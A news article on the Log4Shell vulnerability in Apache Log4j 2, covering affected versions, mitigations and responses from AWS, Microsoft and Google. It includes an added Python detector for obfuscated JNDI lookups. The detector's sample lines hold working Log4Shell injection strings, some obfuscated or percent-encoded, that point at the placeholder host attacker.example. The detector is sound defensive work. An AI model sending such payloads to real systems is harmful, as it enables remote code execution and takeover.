A zero-day exploit that first drew wide attention through the popular game Minecraft has IT departments around the world rushing to update Log4j 2, Apache's widely used Java logging library.
Hyperscalers and others issued patches and warnings over the weekend following news of the zero-day exploit in the Apache Log4j 2 library. An attacker who can get a crafted string into a log message can execute code remotely and take full control of the affected system. Exacerbating the severity of the news, the exploit has been seen in the wild, according to reports. Hyperscalers provided guidance to customers over the weekend on mitigating the exploit and details on which customer-facing services were affected.
The exploit, tracked as CVE-2021-44228 and known colloquially as Log4Shell (some outlets also called it LogJam, a name that collides with the 2015 TLS Diffie-Hellman attack), first came to public notice in the hugely popular game Minecraft, where players triggered it by pasting a crafted string into the in-game chat, which the server logs. Developer Mojang Studios rushed out a patch and told users to update affected servers and systems.
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” reads the Common Vulnerabilities and Exposures (CVE) entry.
Apache Log4j 2 is an open-source logging library for Java. Maintained by the Apache Software Foundation, Log4j 2 is widely used across applications, including enterprise and cloud services. Log4j 2 versions 2.0-beta9 through 2.14.1 are affected by the bug. That includes many cloud services and applications that pull in those versions of Log4j as a dependency, often transitively through another library, so operators need to check bundled jars rather than only declared dependencies.
According to the report, Log4j 2.15.0 disables message lookup substitution by default, closing the reported attack path; the follow-up 2.16.0 release removed message lookups entirely and disabled JNDI by default. For installations that cannot upgrade immediately, Log4j 2.10 and later can set the system property log4j2.formatMsgNoLookups=true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true), and on any 2.x version the JndiLookup class can be removed from the log4j-core jar. Upgrading is the only complete fix: the property-based mitigation was later found insufficient in some non-default configurations.
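The mechanism described above, as an added example that is not code from the original article or from the Log4j project: a Python normalizer that resolves the Log4j 2 lookup forms attackers used to hide the `jndi:` prefix (`${lower:j}`, `${upper:J}`, `${::-j}`, `${env:NaN:-j}`) and undoes percent-encoding, then flags lines that contain a JNDI lookup. This is the kind of matching a WAF or log-search rule for this bug needs to do; a naive search for the literal string `${jndi:` misses most of the obfuscated probes. The hostnames and sample log lines are constructed for the example.

```python
"""Normalize Log4j 2 lookup syntax to expose obfuscated JNDI payloads.

Added example, not part of the original article or the Log4j project.
It resolves only the lookups an attacker can abuse for obfuscation;
everything else is left as written.
"""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: the body contains no further braces.
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")

# After normalization, a JNDI lookup with any of the schemes seen in probes.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)\s*:",
    re.IGNORECASE,
)


def _resolve(match):
    """Resolve one innermost lookup the way Log4j 2 would, as far as
    de-obfuscation needs. Unknown lookups without a default stay as-is."""
    body = match.group(1)
    default = None
    if ":-" in body:                      # ${prefix:key:-default}
        body, default = body.split(":-", 1)
    prefix, _, key = body.partition(":")
    prefix = prefix.strip().lower()       # Log4j lower-cases the prefix
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "jndi":
        return match.group(0)             # keep it: this is what we detect
    if default is not None:
        # ${::-j}, ${env:NaN:-j}, ${sys:nope:-j} all collapse to the default
        return default
    return match.group(0)                 # e.g. ${HOME}: not resolved


def normalize(text, max_rounds=20):
    """Percent-decode, then resolve innermost lookups until the text stops
    changing. The round cap bounds work on inputs built to keep us busy."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line):
    """True if the normalized line carries a JNDI lookup."""
    return JNDI_RE.search(normalize(line)) is not None


# Constructed sample lines (not real traffic); hostnames are placeholders.
SAMPLE_LINES = [
    'GET /login HTTP/1.1 "User-Agent: ${jndi:ldap://attacker.example/a}"',
    'X-Api-Version: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/x}',
    'q=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/y}',
    'Referer: ${${env:NaN:-j}ndi:dns://attacker.example/z}',
    'GET /?s=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fq%7D HTTP/1.1',
    'deploy.sh: echo ${HOME} done',          # shell syntax, benign
    'msg=${lower:HELLO} ${date:yyyy}',       # harmless Log4j lookups
]


def scan(lines):
    """Return (line, flagged) pairs for a batch of log lines."""
    return [(line, is_log4shell_probe(line)) for line in lines]


if __name__ == "__main__":
    for line, flagged in scan(SAMPLE_LINES):
        print("PROBE " if flagged else "clean ", line)
```

The normalizer deliberately leaves `${jndi:...}` in place and only collapses the wrappers around it, so the detector sees the same string Log4j's Interpolator would have resolved. Lines that use `${...}` for other purposes, such as shell variables or benign lookups, are not flagged.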
Hyperscalers act swiftly on Log4J 2
Hyperscalers wasted no time getting the word out over the weekend and putting mitigation strategies in place. AWS posted a warning to let customers know of the issue, encouraging those who manage their own environments to update Log4j to the latest version.
AWS noted that it has updated, or is in the process of updating, internal services that use Log4j. Those include CloudFront, its Content Delivery Network (CDN). AWS said that many services were already updated or were unaffected.
Microsoft issued a response that included mitigation guidance for affected services on Microsoft Azure.
“The scope of impact has expanded to thousands of products and devices, including Apache products such as Struts 2, Solr, Druid, Flink and Swift. Because this vulnerability is in a Java library, the cross-platform nature of Java means the vulnerability is exploitable on many platforms, including both Windows and Linux,” said Microsoft.
Google said that customers of Google Cloud Armor, its network security service, can deploy a new Web Application Firewall (WAF) rule to detect and, optionally, block the exploit. The company also updated Google Cloud IDS, its Intrusion Detection System (IDS), to detect exploitation attempts.
Google Cloud IDS is network security software for businesses that host Virtual Private Clouds (VPC) on Google Cloud. It offers a single interface for threat detection, replacing “patchwork” solutions. Last week Google released IDS in all regions; it had debuted over the summer as a limited-release preview.